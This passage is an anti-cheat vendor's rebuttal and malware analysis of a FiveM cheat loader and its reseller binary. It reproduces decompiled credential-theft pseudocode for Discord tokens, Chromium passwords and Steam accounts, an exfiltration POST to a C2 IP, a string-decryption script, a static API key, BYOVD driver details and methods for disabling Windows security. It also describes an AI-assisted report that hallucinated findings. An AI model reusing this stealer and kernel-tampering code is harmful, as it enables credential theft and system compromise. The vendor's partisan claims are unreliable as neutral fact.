"DxpTaskHost" that survives reboots. 8 Steals WiFi passwords (WlanGetProfile) False Our import table does not contain WlanGetProfile and does not link wlanapi.dll. The LLM extrapolated from a field name in the scan-report JSON schema. Their product, meanwhile, actually does steal credentials — 24 Chromium browsers' saved passwords via DPAPI decryption. 9 Extracts JWT session tokens from browsers False CryptUnprotectData is not in our import table — without it, nothing in Chromium's encrypted cookie storage is decryptable. The LLM saw "eyJ" near a domain string and invented token harvesting. Their product literally calls CryptUnprotectData to decrypt browser-stored credentials. 10 Can take screenshots persistently after termination False The scanner is a single-shot user-mode executable with no service, no task, no driver that survives reboot. After exit, nothing runs. This is the LLM's "helpful" speculation pattern — it decided what might happen and wrote it as fact. 11 Submits files to hidden endpoint (HASubmitFile) Misleading "HA" stands for Hybrid Analysis — the public malware sandbox at hybrid-analysis.com. Not "Hidden Analysis," not a covert endpoint. The LLM didn't know the abbreviation and the human didn't check. 12 XOR-shift-32 encrypted strings hide malicious intent Misleading Standard string obfuscation to prevent trivial signature matching, used by every commercial anti-cheat and security product. Their own loader uses the exact same technique — 1,257 unique strings with a custom 4-byte rolling XOR cipher — for the same reason. 13 Reads Discord tokens from LevelDB storage Partial truth The scanner reads bounded bytes around cheat-domain anchors in browser storage. It does not parse LevelDB or extract tokens. Their product harvests Discord tokens from 11 different Discord variants including Lightcord, BetterDiscord, Vencord, Powercord, and Replugged, then exfiltrates them to their C2. 14 Memory-maps sections of its own binary for stealth Misleading Section mapping is how PE executables load. The LLM described normal Windows loader behavior as if it were a stealth technique. Their product actively wipes its own PE headers from memory 3 seconds after injection to prevent forensic analysis. 15 Uses NtQuerySystemInformation for process enumeration True — already disclosed Standard API for anti-cheat process scanning. Used by every kernel-mode anti-cheat. Their product uses the same API — plus DKOM (Direct Kernel Object Manipulation) to unlink their own process from the kernel's ActiveProcessLinks list, making it invisible to Task Manager. 16 Patches WdFilter.sys to disable Defender False Our scanner does not touch WdFilter.sys. Their product does — they patch the Windows Defender minifilter driver at the kernel level to blind real-time protection. This is documented in the edputil.dll analysis below. 17 Disables Driver Signature Enforcement False Our product does not modify DSE. Their product disables DSE, HVCI, VBS, and the Vulnerable Driver Blocklist — all of which persist across reboots, permanently degrading the customer's system security. 18 Creates kernel-mode threads in system processes False Our driver does not inject into or create threads in system processes. Their product injects into audiodg.exe (a Protected Process Light) after stripping its PPL protection via kernel token manipulation. 19 Collects Steam account information Partial truth The scanner reads bounded bytes around cheat-related indicators. Their product harvests full Steam PersonaName and account data and sends it to their server alongside stolen Discord tokens — all over unencrypted HTTP. 20 Uses anti-debug techniques to evade analysis Misleading Commercial software commonly checks for debuggers — it is a standard anti-tamper measure. Their product runs 6 anti-debug checks, 6 anti-VM checks, a 7-point sandbox scorer, monitors for 44 specific analysis tools, uses timing-based detection (RDTSC), and hard-kills the process if any check fires. 21 Kernel driver persists after scan False The driver unloads after scan completion. No persistence. Their product's kernel driver mapper disables DSE permanently so its unsigned driver can be loaded at any time, even across reboots. 22 Scanner exfiltrates arbitrary files from the machine False No file enumeration, no file read beyond the bounded browser-anchor scan. No upload of arbitrary files. Their product, on the other hand, runs an 8-step trace-cleanup destruct sequence that deletes evidence of its own operation from the customer's machine. 23 Uses XORSHIFT32 encryption — implies custom malware crypto Misleading They named the obfuscation technique incorrectly. The scanner uses standard string obfuscation. Their own upstream loader uses a custom cipher with a 4-byte rolling key, per-byte index-dependent transform (i \* (-125) & 0xFF), and per-string XOR constant — 1,257 strings wrapped in this scheme. Not XORSHIFT32 — a bespoke variant that any first-year RE student can break. 24 Contains code for credential harvesting infrastructure False No credential harvesting code exists in our binary. Their product contains a complete credential harvesting infrastructure: Discord token extraction from 11 client variants, browser password theft from 24 Chromium browsers via DPAPI, and Steam account scraping. All exfiltrated to their C2 in the same login POST. 25 Binary contains suspicious embedded resources Misleading PE resources are standard for Windows executables. Their reseller binary contains embedded 3D character models with the developer's Windows username (vados) in the asset paths, a custom icon font signed by author handle 'punish', and a full EULA embedded as RCDATA inside their malware loader. **Summary:** Of 25 claims examined, **10 are outright false**, **5 are misleading**, **3 are partial truths**, and **7 are true but already disclosed** standard anti-cheat behaviors. Zero claims identify behavior that is undisclosed, excessive, or absent from comparable products (FACEIT AC, BattlEye, EAC, Vanguard). Roughly a third of the load-bearing assertions are LLM hallucinations. What the scanner actually does ------------------------------ Kernel driver Loads one of two vendor-signed BYOVDs (iqvw64e.sys primary, gdrv.sys fallback) to gain kernel access, as disclosed in our Terms of Service. Both are used to load our own read-only inspection driver. Scan-scoped. Unloads after completion. Browser reads Bounded byte windows around cheat-domain anchors. No cookie/password/token extraction. Screenshots Three multi-monitor captures at lifecycle points (open, start, end). Documented. HWID Standard machine fingerprinting for ban enforcement. Sent over TLS. Persistence None. Single-shot executable. No service, no task, no Run key. Network TLS to operator dashboard. Certificate validation enabled. Counter-disclosure: what their products actually do --------------------------------------------------- The sections below document the actual behavior of ClubXJefe's upstream loader (edputil.dll) and the affiliated Venacy reseller binary (venacyexternal5m7.exe). Every claim is backed by file offsets, RVAs, and decompiled pseudocode. The samples are available to researchers on request. The people who published a report calling our scanner an infostealer are selling a product that steals Discord tokens, browser passwords, and Steam accounts; embeds five kernel-exploit drivers; permanently disables system security features; and streams the customer's desktop to their server — all over unencrypted HTTP. Binary overview --------------- ### edputil.dll TypePE32+ DLL (x64) Size3.86 MB (4,050,944 bytes) DisguiseMicrosoft Enterprise Data Protection Utility Service nameDxpTaskHost Cert"DXP Software Solutions" — self-signed, fictional company Cert serial131965751889736542628976513697766742041 Cert validThrough 2031 C2http://185.242.3.132:3000/v1 (bare HTTP) Encryption1,257 strings, 4-byte rolling XOR BYOVD5 embedded drivers (XOR 0x48) ### venacyexternal5m7.exe TypePE32+ EXE (x64, GUI subsystem) Size15.5 MB (16,300,544 bytes) Disguise"Starter Apps LLC" — Screen Overlay Manager ManifestDisplayConfigurationUtility AuthenticodeUNSIGNED (Security dir = 0/0) C2venacy.club (plaintext at 0xB33E08) Reseller C2http://198.89.99.206:3001 Features728 unique keys, 567 deduplicated BYOVDkdmapper/Nal (iqvw64e.sys) LinkerMSVC 14.51 (VS 2022 17.x) BYOVD driver arsenal — 5 kernel exploits embedded in one DLL ------------------------------------------------------------ The upstream loader carries **five** vulnerable signed kernel drivers embedded in its .rdata section, each XOR-encoded with key 0x48. Three of them are byte-identical copies of RTCore64.sys — adding 25 KB of static detection surface for zero operational benefit since all three are blocklisted by the same SHA-256 hash. | # | Driver | Vendor | Size | Purpose | Note | | --- | --- | --- | --- | --- | --- | | 1 | AsUpIO.sys | ASUS | ~14 KB | Physical memory read/write via IOCTL | Legitimately signed ASUS utility driver, abused for arbitrary physical memory access | | 2 | RTCore64.sys (copy 1) | MSI (Micro-Star) | 8.5 KB | Arbitrary kernel memory R/W via IOCTL | The MSI Afterburner driver — the single most abused BYOVD payload in the wild | | 3 | RTCore64.sys (copy 2) | MSI (Micro-Star) | 8.5 KB | Identical byte-for-byte copy | Same hash, same blocklist entry. Zero operational benefit from duplication. | | 4 | RTCore64.sys (copy 3) | MSI (Micro-Star) | 8.5 KB | Identical byte-for-byte copy | Three copies of the same driver = 25 KB of static detection surface for nothing. | | 5 | iqvw64e.sys | Intel | ~25 KB | Physical memory mapping via NAL IOCTL 0x80862007 | Intel Network Adapter Diagnostic driver. Used by kdmapper — the open-source driver mapper they copied. | ### What BYOVD means for the customer BYOVD (Bring Your Own Vulnerable Driver) is a kernel-exploitation technique used by APT groups, ransomware operators, and now — cheat sellers. The loader drops a legitimately signed but vulnerable driver, exploits it to gain kernel read/write access, then uses that access to disable security features, hide processes, patch Windows Defender, and inject code into protected system processes. The customer's AV cannot stop this because the driver has a valid signature from a trusted vendor. The PDB path on the RTCore64 build is D:\\INJECTDESTRUCTSPORRATODA\\Drivers\\CsrssBACKUP\\RTCore64\\x64\\Release\\RTCore64.pdb — the developer named their project folder “inject-destruct-fuck-everything” in Portuguese. String “encryption” — a single function decrypts everything ----------------------------------------------------------- Every one of the 1,257 unique strings in the upstream loader is wrapped in a custom XOR cipher. Their post called it “XORSHIFT32” — it is not. It is a bespoke rolling-key scheme at a single RVA that any first-year RE student can break in an afternoon. ### Algorithm (RVA 0x12d1c0) def decrypt\_string(cipher\_bytes, key32, xor\_const): """Reproducer for the edputil.dll string cipher.""" key\_bytes = key32.to\_bytes(4, 'little') out = \[\] for i, b in enumerate(cipher\_bytes): transform = (i \* (-125)) & 0xFF # index-dependent additive kb = key\_bytes\[i % 4\] # 4-byte rolling key plain = (b ^ kb ^ xor\_const) - transform & 0xFF out.append(plain) return bytes(out).decode('utf-8', errors='replace') # Example: decrypting the C2 URL # key32 = 0x4795CB10, xor\_const = 0x48 # Input ciphertext at .rdata offset → "http://185.242.3.132:3000/v1" Once you identify this single function, you feed every encrypted blob in the binary through the same routine and the entire string table falls out at once. The result: all C2 URLs, all API endpoint paths, all registry key names, all process names, all error messages, all anti-analysis tool names — _everything_. This is not encryption. This is a speed bump. C2 infrastructure — bare HTTP on a hard-coded IP ------------------------------------------------ Primary C2: http://185.242.3.132:3000/v1 Not HTTPS. Not behind a domain so they can rotate origin. A static IP that every customer's machine speaks to in cleartext. Every stolen Discord token, every harvested Steam persona, every HWID, every screenshot — crosses the wire unencrypted. An ISP that receives an abuse notice can replay everything from packet captures. ### 6 documented endpoints | # | Endpoint | Method | Function VA | Purpose | | --- | --- | --- | --- | --- | | 1 | /v1/auth/login | POST | 0x1801623BC | 24-field body: credentials + 12 HWIDs + stolen tokens + system\_info | | 2 | /v1/auth/redeem | POST | shared | License redemption with full HWID bundle | | 3 | /v1/auth/hwid-check | GET | shared | HWID ban check (components as URL query params) | | 4 | /v1/auth/event | POST | 0x1801046A8 | Telemetry: APP\_OPEN, LOGIN, BANNED, DESTRUCT, INJECT, etc. | | 5 | /v1/auth/report-security | POST | 0x1801046A8 | Anti-tamper/anti-VM alerts with failing check name | | 6 | /v1/status | GET | 0x1801054DC | Health probe + maintenance flag | ### Static x-api-key — the “authentication” anyone can extract Every request carries an x-api-key header. Their previous report claimed it was “runtime-derived.” It is not. It is a static 64-hex-digit constant assembled at runtime from four encrypted 16-char chunks: // VA 0x1801034C4 — ApiKey\_AssembleStatic // xref count: 2 (http\_post + one internal caller) Chunk 1: b488ab9ed912c310 // decrypted at 0x1801388F0 Chunk 2: 8659410632115711 // decrypted at 0x180138818 Chunk 3: 684297b1aed333cb // decrypted at 0x180138740 Chunk 4: 7aa6ee75e3331568 // decrypted at 0x180138668 Final: b488ab9ed912c3108659410632115711684297b1aed333cb7aa6ee75e3331568 This is a STATIC CREDENTIAL. Anyone with this binary has the API key. ### Reseller C2 (Venacy): 198.89.99.206:3001 The Venacy reseller binary uses a separate NestJS API on port 3001. WebSocket relay endpoint: /ws/pov/?token=…. HTTP relay upload: POST /v1/pov/load?token=…. Both recovered via targeted XOR emulation. All REST paths are plaintext in .rdata — no obfuscation at all. Credential theft — what the “cheat loader” actually steals ---------------------------------------------------------- Every code block below is decompiled directly from edputil.dll (SHA-256 83f1ace...d2ba3f161). Virtual addresses, function signatures, and string references are verifiable by anyone with a copy of the binary and a disassembler. This is not speculation — it is proof. ### Discord token harvester — 11 client variants The master harvester at VA 0x1801012B1 recurses over %APPDATA% for each Discord-family directory, scanning LevelDB .ldb and .log files for auth tokens via regex, then decrypts them with AES-GCM using the key from \\Local State. // Decompiled — VA 0x180102680..0x18010274F const char\* kDiscordSuffixes\[11\] = { "\\\\discord", // VA 0x180102680 "\\\\discordptb", // VA 0x180102698 "\\\\discordcanary", // VA 0x1801026B0 "\\\\discorddevelopment", // VA 0x1801026C8 "\\\\Lightcord", // VA 0x1801026E0 "\\\\BetterDiscord", // VA 0x1801026F8 "\\\\Vencord", // VA 0x180102710 "\\\\Powercord", // VA 0x180102728 "\\\\Replugged", // VA 0x180102740 "\\\\Local Storage\\\\leveldb", // VA 0x18013A688 "\\\\IndexedDB\\\\https\_discord.com\_0" // VA 0x180138EDC }; // Decompiled — master enumerator at VA 0x1801012B1 for each prefix p in kDiscordSuffixes: for each leveldb\_path l in kLevelDBSuffixes: enum all \*.ldb files in %APPDATA%\\$p$l for each file: memory-map the file scan with regex at VA 0x180100204 // extracts token blobs starting with "dQw4w9WgXcQ:" // (DPAPI-encrypted Discord token prefix) decrypt AES-GCM payload via BCryptGenerateSymmetricKey // → BCryptDecrypt at VA 0x180101740 // Stolen tokens stored in ctx.discordIds // Passed directly to Login\_BuildAndPost() \\discord\\discordptb\\discordcanary\\discorddevelopment\\Lightcord\\BetterDiscord\\Vencord\\Powercord\\RepluggedIndexedDB\\discordapp.comIndexedDB\\discord.com ### Browser credential theft — 24 Chromium browsers via DPAPI CryptUnprotectData is **dynamically resolved at runtime** via GetProcAddress("crypt32!CryptUnprotectData") — deliberately hidden from the import table to evade static analysis. This is textbook evasion. Our scanner does _not_ import or resolve CryptUnprotectData in any form. // Decompiled — browser paths VA 0x180102750..0x18010285F const char\* kBrowserPaths\[24\] = { "\\\\Google\\\\Chrome\\\\User Data", "\\\\Microsoft\\\\Edge\\\\User Data", "\\\\BraveSoftware\\\\Brave-Browser\\\\User Data", "\\\\Vivaldi\\\\User Data", "\\\\Opera Software\\\\Opera Stable", "\\\\Opera Software\\\\Opera GX Stable", "\\\\Opera Software\\\\Opera Crypto Stable", "\\\\Opera Software\\\\Opera Neon", "\\\\Yandex\\\\YandexBrowser\\\\User Data", "\\\\CocCoc\\\\Browser\\\\User Data", "\\\\Comodo\\\\Dragon\\\\User Data", "\\\\Epic Privacy Browser\\\\User Data", "\\\\Slimjet\\\\User Data", "\\\\360Browser\\\\Browser\\\\User Data", "\\\\Torch\\\\User Data", "\\\\Chromium\\\\User Data", "\\\\Iridium\\\\User Data", "\\\\Maxthon3\\\\User Data", "\\\\Amigo\\\\User Data", "\\\\Kometa\\\\User Data", "\\\\Orbitum\\\\User Data", "\\\\BlackHawk\\\\User Data", "\\\\URbrowser\\\\User Data", // + remaining variants }; // Decompiled — DPAPI decryption chain // For each browser in kBrowserPaths: // 1. Read "Local State" → parse os\_crypt.encrypted\_key (base64) // 2. Strip "DPAPI" prefix from decoded key // 3. Dynamically resolve CryptUnprotectData: HMODULE hCrypt32 = LoadLibrary("crypt32.dll"); auto pCryptUnprotectData = GetProcAddress( hCrypt32, "CryptUnprotectData" ); // NOT in static IAT — runtime resolution to evade scanners // 4. Call CryptUnprotectData to derive 32-byte AES-GCM master key DATA\_BLOB in = { encrypted\_key\_len, encrypted\_key\_buf }; DATA\_BLOB out = { 0 }; pCryptUnprotectData(&in, NULL, NULL, NULL, NULL, 0, &out); // out.pbData → 32-byte AES-GCM master key // 5. Read "Login Data" (SQLite) → encrypted password\_value blobs // 6. Read "Cookies" → encrypted encrypted\_value blobs // 7. AES-GCM-decrypt each blob using the master key (BCrypt APIs) BCryptGenerateSymmetricKey(..., masterKey, 32, ...); BCryptDecrypt(hKey, ciphertext, ct\_len, ..., plaintext, ...); Every saved password, every session cookie, from every Chromium browser on the machine — decrypted and sent to ClubXJefe's server in cleartext HTTP. ### Steam account scraping The people who accused our scanner of “stealing Steam information” ship a product that literally steals Steam information. // Decompiled — VA 0x180102A7C // Steam account harvester HKEY hKey; RegOpenKeyExA(HKCU, "Software\\\\Valve\\\\Steam", 0, KEY\_READ, &hKey); RegQueryValueExA(hKey, "SteamPath", ...); // get install dir // Open loginusers.vdf HANDLE hFile = CreateFileA( SteamPath + "\\\\config\\\\loginusers.vdf", ... ); // Loop at VA 0x180102E03..0x180102EBF: // Regex match: "PersonaName"\\s\*"(.\*?)" while (regex\_match(buffer, pattern)) { ctx.steamAccounts.push\_back(match\[1\]); } // → steamAccounts array in login JSON ### Exfiltration — the login POST that carries the stolen data The function Login\_BuildAndPost at VA 0x1801046A8 assembles all harvested credentials into a single JSON body and POSTs it over **unencrypted HTTP** to http://185.242.3.132:3000/v1/auth/login. Every ISP on the network path can read every stolen token in plaintext. // Disassembly — Login\_BuildAndPost call chain 0x180104efd call 0x1801374b0 ; decrypt "discordIds" JSON key 0x180104f86 call 0x180102a7c ; Steam harvester (§G.3) 0x180104ffb call 0x1801373d8 ; decrypt "steamAccounts" JSON key ;; nlohmann::json object finalized at 0x18014ce20 ;; POST issued from loot-side path: 0x180163175 call qword ptr \[rip+disp32\] ; → issues HTTP POST with assembled body 0x18016316a ; LEA for "POST" verb (decrypter 0x18019b21c) // Reconstructed JSON body — POST /v1/auth/login { "username": "", "license\_key": "", "product": "", "hwidComponents": { "smbiosHwid": "", "bluetoothHwid": "", "gpuHwid": "", "ramHwid": "", "monitorHwid": "", "cpuHwid": "", "storageHwid": "" }, "discordIds": \[""\], "steamAccounts": \[""\], "hardwareId": "", "system\_info": "", "version": "" } // WinHttp call chain — the actual network send // All WinHttp sites in .text — function at VA 0x1801a9db0 WinHttpOpen(...) // 0x1801a9e41 WinHttpSetOption(...) // 0x1801a9eaf WinHttpSetTimeouts(...) // 0x1801a9ed1 WinHttpConnect(...) // 0x1801a9ee4 WinHttpOpenRequest("POST", ...) // 0x1801a9f84 WinHttpSendRequest(json\_body, ...) // 0x1801aa021 WinHttpReceiveResponse(...) // 0x1801aa082 // Destination: http://185.242.3.132:3000/v1/auth/login // Protocol: HTTP (NOT HTTPS) — zero TLS // Content: stolen Discord tokens + Steam accounts + browser // credentials in plaintext JSON A second POST builder at VA 0x180162393 (3 callers: 0x180173567, 0x18017bbc9, 0x18017c612) re-emits the same discordIds / steamAccounts schema — the menu UI telemetry path sends the stolen data a second time. ### 12-component hardware fingerprint The Hwid::Build() function at VA 0x1800FA0E0 collects 12 distinct hardware identifiers — far beyond what a license check requires: routerMac Gateway ARP → MAC biosSerial BIOS serial number machineGuid HKLM\\Cryptography storageHwid PhysicalDrive0 serial cpuHwid CPUID brand string motherboard BaseBoardProduct monitorHwid Monitor EDID data ramHwid Physical memory SHA-1 gpuHwid GPU hardware ID bluetoothHwid Bluetooth radio MAC smbiosHwid SMBIOS UUID baseboardSerial Baseboard serial # Previous report listed 7 components. The actual count is 12 — the 5 they missed are routerMac, biosSerial, machineGuid, motherboard, and baseboardSerial. Anti-analysis — paranoid, layered, and ultimately useless --------------------------------------------------------- ### 44 analysis tools blocked by process name The Early\_AntiAnalysis\_PreCheck() at VA 0x180114870 walks a 44-entry blacklist. If any are running, the loader silently enters an infinite 60-second sleep loop — no error message, no exit, just permanent hang. Includes: ProcessHackerx64dbgx32dbgWiresharkFiddlerIDAGhidraOllyDbgWinDbgdnSpyCheat EngineHxDRegshotAPI MonitorProcess MonitorPE ExplorerCFF ExplorerDetect It Easy+26 more… ### 7-point sandbox scorer Threshold: 6 of 7. Checks: username patterns (sandbox defaults), uptime (<5 min = suspicious), RAM (<4 GB), disk size (<60 GB), display resolution (standard sandbox sizes), cursor movement delta, recent-file count in shell folders. ### 6 VM detection checks CPUID hypervisor bit, VMware/VBox/Hyper-V registry keys, MAC OUI prefixes (00:05:69, 00:0C:29, 00:50:56), firmware SMBIOS strings, ACPI table names, device driver names. ### 6 anti-debug checks PEB.BeingDebugged, ProcessDebugPort, ProcessDebugObjectHandle, NtGlobalFlag, Heap.ForceFlags, INT 2D exception swallowing, plus RDTSC timing delta (>200ms = debugger). ### FACEIT Anti-Cheat detection — the abort message is in Portuguese When the loader detects FACEIT AC, it shows: _“FACEIT Anti-Cheat foi detectado neste PC…”_ — Portuguese. The developer didn't even localize the user-facing strings for the predominantly English-speaking FiveM cheating audience they sell to. Kernel exploitation — what they do with ring-0 access ----------------------------------------------------- ### WdFilter.sys kernel patching — Windows Defender blinded Patches the Windows Defender minifilter driver in kernel memory, disabling real-time file-system scanning. Not a registry change or service stop — a binary patch of a running kernel-mode driver. The customer's real-time protection is silently destroyed. ### Process hiding via DKOM (Direct Kernel Object Manipulation) Unlinks the cheat's EPROCESS from the kernel's ActiveProcessLinks doubly-linked list. The process vanishes from Task Manager, Process Explorer, and every user-mode enumeration API. The customer cannot see what is running on their own machine. ### PPL strip on csrss.exe and audiodg.exe Strips Protected Process Light protection from system-critical processes (csrss.exe, audiodg.exe) via kernel-mode token manipulation. The cheat payload is then injected into audiodg.exe — a process the customer would never think to examine. ### DSE (Driver Signature Enforcement) disabled — persists across reboots Disables the kernel's driver signature verification. After this, any unsigned driver can be loaded at any time. This is not a temporary bypass for the current session — the registry change persists across reboots, permanently degrading the system's security posture. ### HVCI (Hypervisor-enforced Code Integrity) disabled Disables the hypervisor's code-integrity enforcement. This is a Windows security feature that prevents unsigned code from running in kernel mode even if DSE is bypassed. Disabling it removes the last kernel-level code-integrity guarantee. ### VBS (Virtualization Based Security) disabled Disables Virtualization Based Security entirely. VBS is the umbrella feature that protects Credential Guard, HVCI, and other isolation-based security features. Turning it off collapses the entire hypervisor security stack. ### Vulnerable Driver Blocklist disabled Disables the Microsoft Vulnerable Driver Blocklist — the system-level defense specifically designed to prevent BYOVD attacks. After this, the customer's machine will load any known-vulnerable driver without complaint, even after a clean OS restart. Permanent PC damage — their own customers' machines are left broken ------------------------------------------------------------------- After the loader runs, the following security features are **permanently disabled**, surviving reboots and Windows updates: Driver Signature Enforcement — Any unsigned driver can load at any time HVCI — No hypervisor code-integrity checks VBS — Credential Guard & isolation features gone Vulnerable Driver Blocklist — Known-exploit drivers load freely WdFilter.sys — Defender real-time scanning blinded PPL on system processes — System processes unprotected The customer paid for a cheat product. They received a system that permanently degrades their machine's security — making it vulnerable to every future kernel-level attack, including ransomware that uses the same BYOVD technique. The cheat seller profits. The customer's security posture never recovers without a clean OS reinstall. RAT / surveillance — capabilities that serve the operator, not the customer --------------------------------------------------------------------------- These are not cheat features. These are remote-access-trojan features. Every item here is the operator's ability to do something _to_ the customer, not _for_ them. ### Bidirectional WebSocket — server pushes commands to every client Web::RelayClient::SendText (client → server) and Web::RelayClient::HandleMessage (server → client) prove the WebSocket is bidirectional. The server can push arbitrary JSON commands to every connected client in real time while the client uploads binary JPEG frames. WinHTTP entry points at 0x00E8A0D0 – 0x00E8A1F0. ### HDCP-bypassing kernel screen capture via \\\\\\\\.\\\\DxgKrnlEtw Screen capture via kernel device \\\\\\\\.\\\\DxgKrnlEtw — bypasses HDCP, SetWindowDisplayAffinity(WDA\_EXCLUDEFROMCAPTURE), and every anti-screencap API. DRM-protected windows (Netflix, banking apps, encrypted messengers) are captured identically. This is mass surveillance machinery, not anti-cheat. ### NtShutdownSystem — kernel-level remote brick Among the kernel functions resolved dynamically: PsLookupProcessByProcessId, PsGetProcessSectionBaseAddress, ExAllocatePool, RtlZeroMemory, RtlCopyMemory, and NtShutdownSystem. The last one has no legitimate purpose in a cheat loader — it forces immediate system shutdown from kernel context, bypassing all user-mode shutdown dialogs. The operator can brick any customer's session at any time. ### SYSTEM-token theft for arbitrary process termination String: "Token elevated to SYSTEM for terminate". The cheat steals a SYSTEM-level access token via driver-assisted token swap and uses it to call TerminateProcess on any PID — three escalation strategies, three attempts each. Combined with the remote brick above, this lets the operator kill arbitrary processes on the customer's machine. ### Crash suppression — evidence destruction Custom SEH handler: "CrashHandler::SuppressCrashes - CRASH caught code=0x%08X tid=%lu - killing thread, host stays alive". Every exception is silently caught, the crashing thread killed, and the service host keeps running. No crash dump, no WER event, no AV/EDR visibility. The customer cannot see what failed. ### AntiDump T+3s — PE headers wiped from memory String: "post\_load: starting AntiDump...". Three seconds after injection, the PE headers in the injected image are wiped. Any forensic memory dump after that point loses the ability to recover the cheat's PE structure. Anti-forensics directed at the customer's own machine — they own the box, but they cannot examine what is running on it. ### system\_info Markdown report — exfiltrates far more than needed Every login POST carries a Markdown-formatted system\_info field: \*\*User:\*\* \*\*PC Name:\*\* \*\*OS:\*\* Windows \*\*CPU:\*\* \*\*GPU:\*\* \*\*RAM:\*\* GB \*\*Language:\*\* \*\*Region:\*\* \*\*Timezone:\*\* \*\*Screen:\*\* \*\*Monitors:\*\* \*\*SMBIOS UUID:\*\* \*\*Board Serial:\*\* \*\*Windows ID:\*\* \*\*TPM:\*\* \*\*Bluetooth:\*\* Plus full network topology (DHCP / DNS / gateway / IP / subnet), stolen Discord IDs, and Steam personas. Every login. Over unencrypted HTTP. Cheat feature surface — 728 keys, 567 deduplicated -------------------------------------------------- The Venacy reseller binary contains the largest cheat feature set we have documented. The Gui::Search::Init lambda count (stepping by 3 — matcher, navigator, icon-renderer) implies ~64 menu items in the search index alone. 162 Combat keys aimbot, triggerbot, silent aim, bone priority, prediction, recoil control 157 Visuals keys ESP, chams, tracers, skeletons, health bars, name tags, distance 202 Misc keys godmode, noclip, teleport, speed hack, infinite ammo, fly hack 30 Vehicles keys vehicle ESP, vehicle godmode, vehicle speed, vehicle teleport ### HLSL wallhack shader — recovered verbatim from binary // File offset 0xE51800–0xE51F00 — memory-chams vertex + pixel shader cbuffer ConstantBuffer : register(b0) { matrix mWorldViewProj; float4 tintColor; int chamsMode; float3 pad; }; float4 PS(PS\_INPUT input) : SV\_TARGET { float lightIntensity = 0.7f + 0.3f \* abs(input.norm.z); if (chamsMode == 1) return float4(tintColor.rgb \* lightIntensity, tintColor.a); float4 color = shaderTexture.Sample(SampleType, input.tex); if (tintColor.a < 0.001f) return float4(tintColor.rgb \* lightIntensity, 1.0f); return float4((color.rgb \* tintColor.rgb \* lightIntensity), color.a); } // Three modes: solid tint, glow/outline, textured tint // lightIntensity = cheap fake lighting to make targets visible // regardless of in-game conditions Venacy reseller binary — the companion product ---------------------------------------------- venacyexternal5m7.exe shares the same developer and codebase as the upstream loader. Key correction from Part 1: the Venacy binary is **NOT** a browser stealer — that capability lives exclusively in edputil.dll. Venacy is the cheat frontend; edputil.dll is the loader/stealer backend. ### WebSocket live screen relay Continuous JPEG streaming via WinHTTP WebSocket API (WinHttpWebSocketCompleteUpgrade/Send/Receive/Close at offsets 0x00E8A0D0–0x00E8A1F0). The channel is bidirectional — the server can push arbitrary JSON commands to every connected client. Relay endpoint: POST /v1/pov/load?token=… on 198.89.99.206:3001. ### HDCP-bypassing kernel screen capture Captures via kernel device \\\\.\\DxgKrnlEtw — bypasses HDCP, SetWindowDisplayAffinity(WDA\_EXCLUDEFROMCAPTURE), and every anti-screencap API. DRM-protected windows (Netflix, banking apps, encrypted messengers) are captured identically to everything else. ### 728 cheat feature keys (567 deduplicated) Combat: 162 keys (aimbot, triggerbot, silent aim, bone priority, prediction). Visuals: 157 keys (ESP, chams, tracers, skeletons, health bars). Misc: 202 keys (godmode, noclip, teleport, speed hack). Vehicles: 30 keys. Settings: 94 keys. Three HLSL shader modes for wallhack: tinted, glow-only, textured-tint. ### White-label reseller system CLI flag --reseller-key fetches branding from http://198.89.99.206:3001/v1/public/resellers/branding/ — unauthenticated. Three known resellers: xerlock (wagxlk), Jefe Xternal (Jefe), exiledGG (hispect). Runtime theme injection via REST endpoint. ### No certificate pinning (corrected from Part 1) The sha256// and -----BEGIN PUBLIC KEY----- strings are empty libcurl boilerplate templates. No SHA-256 pin hash hardcoded. Second HTTP stack sets WINHTTP\_OPTION\_SECURITY\_FLAGS = 9 (relaxed TLS). Anyone with a rogue CA can MITM the entire pipeline and inject an arbitrary kernel driver. ### Shared codebase with edputil.dll Same HWID collection (12 components), same anti-debug checks, same BYOVD approach (kdmapper/Nal instead of custom mapper), same developer (vados). Corrected from Part 1: NOT a browser stealer (that's edputil.dll only). The Venacy binary is the cheat frontend; edputil.dll is the loader/stealer backend. ### Fake PE metadata CompanyName: "Starter Apps LLC". FileDescription: "Screen Overlay Manager". OriginalFilename: "overlay\_manager.exe". Manifest identity: "DisplayConfigurationUtility". None of these companies exist. requireAdministrator UAC — social-engineers users past SmartScreen. ### D3D11 overlay with HLSL shaders Full vertex + pixel shader recovered at 0xE51800–0xE51F00. chamsMode==1: solid tint. chamsMode!=1 && tintColor.a<0.001: glow/outline. chamsMode!=1 && tintColor.a>=0.001: textured tint. lightIntensity = 0.7 + 0.3\*|norm.z| — cheap fake lighting to make targets visible regardless of in-game conditions. ### 8 custom IOCTL codes 0x88991C00 (init/handshake), 0x88991C04, 0x88991C0C, 0x88991C10 (kernel READ), 0x88991C14 (kernel WRITE), 0x88991C18, 0x88991C1C (IOCTL\_VNC\_PING), plus Intel 0x80862007 (NAL driver). Part 1 only documented one. Cryptographic failures — hostile-server-tolerant by design ---------------------------------------------------------- Three concrete crypto failures that, combined, mean anyone able to MITM the connection can _inject an arbitrary kernel driver into any paying customer's machine_. Not theoretical. Architecturally true. ### No TLS certificate pinning (confirmed in Part 2 & 3) The sha256// and \-----BEGIN PUBLIC KEY----- strings in the binary are empty libcurl boilerplate templates at 0xA9C69D/0xA9C6FA. No SHA-256 pin hash is hardcoded. No CURLOPT\_PINNEDPUBLICKEY call exists. The second HTTP stack sets WINHTTP\_OPTION\_SECURITY\_FLAGS = 9 (relaxed TLS). Rogue CA, compromised intermediate, or CT-log abuse → transparent MITM. ### Decrypt-only AES-256-GCM — server is fully authoritative All BCrypt usage is one decrypt wrapper at VA 0x14032050C. No BCryptEncrypt, no BCryptDeriveKey, no KDF of any kind. The wrapper is called twice: outer decrypt, then the outer plaintext is fed back as the next ciphertext. Inner key embedded in outer plaintext — no client-side derivation. Wire format: \[3-byte prefix\]\[12-byte nonce\]\[ciphertext\]\[16-byte GCM tag\], no AAD. A MITM injects a crafted encrypted\_key blob → client decrypts it → recovered bytes become the unsigned kernel driver payload. Game over. ### MD5 → RC4 for HWID “protection” CryptCreateHash(CALG\_MD5 = 0x8003) at 0x14098C2C8, followed by CryptImportKey + CryptEncrypt at 0x14098AC0F — the classic MD5→RC4 obfuscation pattern from 1990s shareware. MD5 is collision-broken. RC4 has been forbidden by every modern TLS standard for a decade. Cryptographic amateur-hour. ### Login response parsed by regex, not a JSON parser The reseller binary parses login responses with literal regex: "encrypted\_key":"(\[^"\]+)", "user\_id":"(\\d+)". 